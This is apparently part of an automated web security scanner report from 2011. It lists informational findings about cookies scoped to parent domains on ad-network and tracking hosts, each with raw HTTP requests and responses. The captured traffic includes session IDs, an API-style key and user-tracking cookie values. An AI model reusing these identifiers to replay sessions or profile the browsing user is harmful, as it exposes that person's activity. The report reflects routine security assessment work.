Path:   /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Date: Mon, 03 Oct 2011 00:09:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...
13.115. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.915323.812164.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595
Date: Mon, 03 Oct 2011 00:09:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000
...[SNIP]...
13.116. http://rs.gwallet.com/r1/pixel/x1743  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_oo=1; ra1_uid=4711648038188259648

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 01-Oct-2012 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=DDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 02-Oct-2016 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>
13.117. http://rs.gwallet.com/r1/pixel/x914r7675757  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x914r7675757

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x914r7675757 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/ROne/ro_x914.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 248
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 02-Oct-2012 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=FDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 03-Oct-2016 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><!-- PubMatic- Exclude user - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MiZjb2RlPTIwNTQmdGw9NTE4NDAw
' width='1' height
...[SNIP]...
13.118. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=14.0.835.187&pver=2.2&wrkey=AKEgNitErWf0UFLnRnw3Az6mp57JIWbOiz4iR9gNFsjxTOQfoHIRqIpBEuaneWSYfX0d7kUgr1D2W0FMpF_cHSqPs9XEwGa4Xg== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 195
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch

goog-malware-shavar;a:37678-51238:s:50280-62140:mac
goog-phish-shavar;a:154883-165954:s:77359-81359:mac
goog-badbinurl-shavar;a:137-2537:s:61-2536:mac
goog-badbin-digestvar;a:19-1911:s:3-397:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=3dfb46e0dc07a7d7:TM=1317604332:LM=1317604332:S=S2Ouy3CEy9MxV-6M; expires=Wed, 02-Oct-2013 01:12:12 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:12:12 GMT
Server: Chunked Update Server
Content-Length: 686
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Expires: Mon, 03 Oct 2011 01:12:12 GMT
Cache-Control: private

m:Tr-1oiyw-IJER2A0oBF6b_mKSpU=
n:1890
i:goog-badbin-digestvar
i:goog-badbinurl-shavar
i:goog-malware-shavar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYveUDINDlAyoH
...[SNIP]...
13.119. http://sales.liveperson.net/hc/15744040/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/15744040/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/15744040/?&site=15744040&cmd=mTagKnockPage&lpCallId=482200729660-510428063105&protV=20&lpjson=1&id=2559909213&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotel-obtz3-english%7ClpMTagConfig.db3%7ClpButtonDiv3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1317600745459; expires=Tue, 04-Oct-2011 00:12:25 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2011 00:12:25 GMT
Set-Cookie: HumanClickSiteContainerID_15744040=STANDALONE; path=/hc/15744040
Set-Cookie: LivePersonID=-5110247826455-1317600658:-1:1317600658:-1:-1; expires=Tue, 02-Oct-2012 00:12:25 GMT; path=/hc/15744040; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1510

lpConnLib.Process({"ResultSet": {"lpCallId":"482200729660-510428063105","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
13.120. http://servedby.flashtalking.com/click/1/16628  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /click/1/16628

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/1/16628;183799;231524;211;162480/?g=1343AC00FD7B0F&random=1244&ft_sgid=542&url=http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:58:02 GMT
Cache-Control: no-cache, no-store
Content-Length: 0
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Via: 1.1 sjc005200 (MII-APC/2.1)
Content-Type: text/plain

13.121. http://servedby.flashtalking.com/imp/1/16628  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:2-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:53:28 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 02 Oct 2011 23:53:28 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 582


var ftGUID_183799="1343AC00FD7B0F";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;li
...[SNIP]...
13.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&prevkadIds=21557&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame22662026621&kltstamp=2011-9-2%2020%3A53%3A2&ranreq=0.7874341141432524&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x39&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:59 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:58 GMT; path=/
Set-Cookie: pubfreq_26621_21556_1478501671=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:59 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:59 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame22662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA0VAAAAAA
...[SNIP]...
13.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A3&ranreq=0.2315859266091138&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:00 GMT
Content-Length: 1389
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:00 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1797109372=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:00 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
13.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4_0&hotel=omni_hotels&random=656365&tile=564238840132219&section=detailskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A11%3A12&ranreq=0.7082862977404147&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
